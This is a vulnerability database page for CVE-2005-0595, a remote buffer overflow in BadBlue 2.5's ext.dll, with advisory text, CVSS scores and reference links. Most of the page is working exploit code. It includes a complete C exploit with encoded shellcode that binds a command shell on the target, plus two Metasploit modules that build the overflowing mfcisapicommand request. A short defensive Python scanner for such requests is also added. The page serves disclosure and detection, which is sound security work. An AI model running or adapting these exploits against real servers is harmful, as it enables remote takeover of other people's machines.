CVE-2005-0595
CVSS7.5
Published: 2005-05-02 00:00:00
Last revised: 2008-09-05 16:46:45

[Original] Buffer overflow in ext.dll in BadBlue 2.55 allows remote attackers to execute arbitrary code via a long mfcisapicommand parameter.


[CNNVD] BadBlue ext.dll mfcisapicommand Remote Buffer Overflow Vulnerability (CNNVD-200505-653)

BadBlue is a combined Web/P2P server program that supports CGI and ISAPI. Its bundled ISAPI module provides a language for embedding dynamic web pages in HTML. BadBlue contains a vulnerability in the handling of certain kinds of overlong, malformed requests; a remote attacker may be able to exploit it to execute arbitrary commands on the server with the privileges of the web process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may cause performance degradation or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0595
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0595
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-653
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/12673
(PATCH)  BID  12673
http://secunia.com/advisories/14405
(VENDOR_ADVISORY)  SECUNIA  14405
http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0599.html
(PATCH)  FULLDISC  20050226 Badblue HTTP Server, ext.dll buffer overflow

- Vulnerability information

BadBlue ext.dll mfcisapicommand Remote Buffer Overflow Vulnerability
High risk   Buffer overflow
2005-05-02 00:00:00 2006-08-23 00:00:00
Remote

- Advisory and patch

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
http://www.badblue.com/index.htm

- Vulnerability information (845)

BadBlue 2.5 Easy File Sharing Remote Buffer Overflow (EDBID:845)
windows remote
2005-02-27 Verified
80 class101
/*
BadBlue, Easy File Sharing Remote BOverflow

Homepage:         badblue.com
Affected version: v2.5 (2.60 and below not tested)
Patched  version: v2.61
Link:             badblue.com/bbs98.exe
Date:             27 February 2005

Application Risk: Severely High
Internet Risk:    Low

Discovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits : class101 & metasploit.com

Hole History:

 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
 27-2-2002: Hat-Squad.com releases an exploit
 28-2-2005: haxorcitos releases a dupe with fake date :>
            or you sux doing private stuffs.

Notes:

 -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
BadBlue
 -using offsets from ext.dll, universal.
 -use findjmp2 to quick search into ext.dll to see
  if the offsets changes in the others BadBlue's versions below 2.5
 -if you need the v2.5 for exploitation practice, get it on class101.org
 -rename to .c for nux, haven't tested this one but it should work fine.

Greet:

 Nima Majidi
       Behrang Fouladi
 Pejman
 Hat-Squad.com
 metasploit.com
 A^C^E of addict3d.org
 str0ke of milw0rm.com
 and my homy class101.org :>
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]=
/*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";

char payload[1024];

char ebx[]="\x05\x53\x02\x10";  /*call.ext.dll*/
char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
char pad[]="\xEB\x0C\x90\x90";
char pad2[]="\xE9\x05\xFE\xFF\xFF";
char EOL[]="\x0D\x0A\x0D\x0A";
char talk[]=
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
   if (strlen(argv[2])<7){usage(argv[0]);return -1;}
   if (argc==6)
{
       if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
  gip=inet_addr(argv[4])^(long)0x93939393;
 gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
 gip=inet_addr(argv[4])^(ULONG)0x93939393;
 gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro.   English\n[+]            Win2k SP- -      -";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2  Pro. English\n[+] WinXP SP1a Pro. English\n[+]            WinXP SP-  -    -";}
if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] Win2003 SP- -      -";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
printf("[+] get the source at class101.org and update yourself!\n");return -1;}
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
 case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
 case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
 default:
 if(FD_ISSET(s,&mask))
 {
  printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
  Sleep(1000);
#else
  Sleep(1);
#endif
  strcpy(payload,talk);
  memset(payload+29,0x90,520);
  if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
  {
   memcpy(payload+29+492,&pad,4);
   memcpy(payload+521+4,target,4);
   memcpy(payload+536+1,pad2,5);
  }
  else
  {
   memcpy(payload+29+485,&pad,4);
   memcpy(payload+514+4,target,4);
   memcpy(payload+529+1,pad2,5);
  }
  strcat(payload,EOL);
  memcpy(payload+36+3,scode,strlen(scode));
  if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
  Sleep(2000);
#else
  Sleep(2);
#endif

  printf("[+] size of payload: %d\n",strlen(payload));
  printf("[+] payload sent.\n");
  return 0;
 }
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

void usage(char* us)
{
printf("USAGE:\n");
printf("      [+]  . 101_bblu.exe Target VulnIP (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET:                               \n");
printf("      [+] 1. Win2k  SP4  Server English (*)\n");
printf("      [+] 1. Win2k  SP4  Pro    English (*)\n");
printf("      [+] 1. Win2k  SP-  -      -          \n");
printf("      [+] 2. WinXP  SP2  Pro.   English    \n");
printf("      [+] 2. WinXP  SP1a Pro.   English (*)\n");
printf("      [+] 2. WinXP  SP-  -      -          \n");
printf("      [+] 3. Win2k3 SP0  Server Italian (*)\n");
printf("      [+] 3. Win2k3 SP-  -      -          \n");
printf("NOTE:                                      \n");
printf("      The exploit bind a cmdshell port 101 or\n");
printf("      reverse a cmdshell on your listener.\n");
printf("      A wildcard (*) mean tested working, else, supposed working.\n");
printf("      A symbol   (-) mean all.\n");
printf("      Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ===================================================[0.1]=====\n");
printf("        ================BadBlue, Easy File Sharing 2.5===============\n");
printf("        ================ext.dll, Remote Stack Overflow===============\n");
printf("        ======coded by class101==================[Hat-Squad.com]=====\n");
printf("        =====================================[class101.org 2005]=====\n");
printf(" \n");
}

// milw0rm.com [2005-02-27]

- Vulnerability information (16761)

BadBlue 2.5 EXT.dll Buffer Overflow (EDBID:16761)
windows remote
2010-07-07 Verified
80 metasploit
##
# $Id: badblue_ext_overflow.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
	# However, a proper Server header is returned when requesting /index.html or using HEAD.
	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BadBlue 2.5 EXT.dll Buffer Overflow',
			'Description'    => %q{
				This is a stack buffer overflow exploit for BadBlue version 2.5.
			},
			'Author'         => 'acaro <acaro [at] jervus.it>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9719 $',
			'References'     =>
				[
					[ 'CVE', '2005-0595' ],
					[ 'OSVDB', '14238' ],
					[ 'BID', '7387' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }],
				],
			'DisclosureDate' => 'Apr 20 2003',
			'DefaultTarget'  => 0))
	end

	def check
		info = http_fingerprint  # check method
		if (info =~ /BadBlue\/2\.5/)
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		uri     = "GET /ext.dll?mfcisapicommand="
		sploit  = rand_text_alphanumeric(500)
		seh     = generate_seh_payload(target.ret)
		sploit[492, seh.length] = seh
		uri << sploit

		print_status("Trying target #{target.name}...")
		send_request_raw({ 'uri' => uri })

		handler
	end

end

- Vulnerability information (F83022)

BadBlue 2.5 EXT.dll Buffer Overflow (PacketStormID:F83022)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,overflow
CVE-2005-0595

This is a stack overflow exploit for BadBlue version 2.5.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'BadBlue 2.5 EXT.dll Buffer Overflow',
			'Description'    => %q{
				This is a stack overflow exploit for BadBlue version 2.5.
			},
			'Author'         => 'acaro <acaro [at] jervus.it>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0595' ],
					[ 'OSVDB', '14238' ],
					[ 'BID', '7387' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], 
				],
			'DisclosureDate' => 'Apr 20 2003',
			'DefaultTarget'  => 0))
			
			register_options( [ Opt::RPORT(80) ], self.class )
	end

	def check
		connect

		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /BadBlue\/2.5/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		uri     = "GET /ext.dll?mfcisapicommand=" 
		sploit  = rand_text_alphanumeric(500) 
		seh     = generate_seh_payload(target.ret)
		sploit[492, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(uri + sploit + "\r\n\r\n")
		
		handler
		disconnect
	end

end

- Vulnerability information

14238
BadBlue ext.dll mfcisapicommand Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

A REMOTE overflow exists in BadBlue http Server. The BadBlue http Server fails to validate the mfcisapicommand parameter resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.
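As an added defensive illustration, not code from the page or from BadBlue's authors: a small Python scanner that flags request lines with the shape the advisory and both exploit listings describe, an overlong or non-printable mfcisapicommand value sent to ext.dll. The length threshold and the sample request lines are constructed for this example.

```python
import re

# Constructed threshold for this example: the published exploits place the SEH
# overwrite about 492 bytes into the parameter, while a genuine command name is
# a short word, so a generous cap still separates the two.
MAX_PARAM_LEN = 256

# The exploits send "GET /ext.dll?..." with no HTTP version, so it is optional.
REQUEST_LINE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/\d\.\d)?\s*$')

def mfcisapicommand_value(target):
    """Return the raw, undecoded mfcisapicommand value from a request target, or None."""
    path, _, query = target.partition('?')
    if not path.lower().endswith('/ext.dll'):
        return None
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        if key.lower() == 'mfcisapicommand':
            return value
    return None

def classify_request_line(line, max_len=MAX_PARAM_LEN):
    """Return 'ignore' (not a request line), 'benign', or 'suspicious'."""
    m = REQUEST_LINE.match(line.rstrip('\r\n'))
    if not m:
        return 'ignore'
    value = mfcisapicommand_value(m.group('target'))
    if value is None:
        return 'benign'
    # Overlong values, or bytes outside printable ASCII, are what the overflow requests look like.
    if len(value) > max_len or any(not 32 <= ord(c) <= 126 for c in value):
        return 'suspicious'
    return 'benign'

def scan(lines):
    """Return the 1-based indices of suspicious request lines."""
    return [i for i, line in enumerate(lines, 1)
            if classify_request_line(line) == 'suspicious']

# Constructed sample traffic: a legitimate ISAPI call, a long request to another
# path, a request shaped like the published exploit, and a plain HEAD.
SAMPLE_LINES = [
    'GET /ext.dll?mfcisapicommand=search&query=music HTTP/1.1',
    'GET /files/' + 'a' * 600 + '.mp3 HTTP/1.0',
    'GET /ext.dll?mfcisapicommand=' + 'A' * 500,
    'HEAD /index.html HTTP/1.0',
]

SUSPICIOUS = scan(SAMPLE_LINES)  # [3]
```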

- Timeline

2005-02-25 2004-12-01
2005-02-26 2007-03-26

- Solution

Upgrade to version 2.60 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author
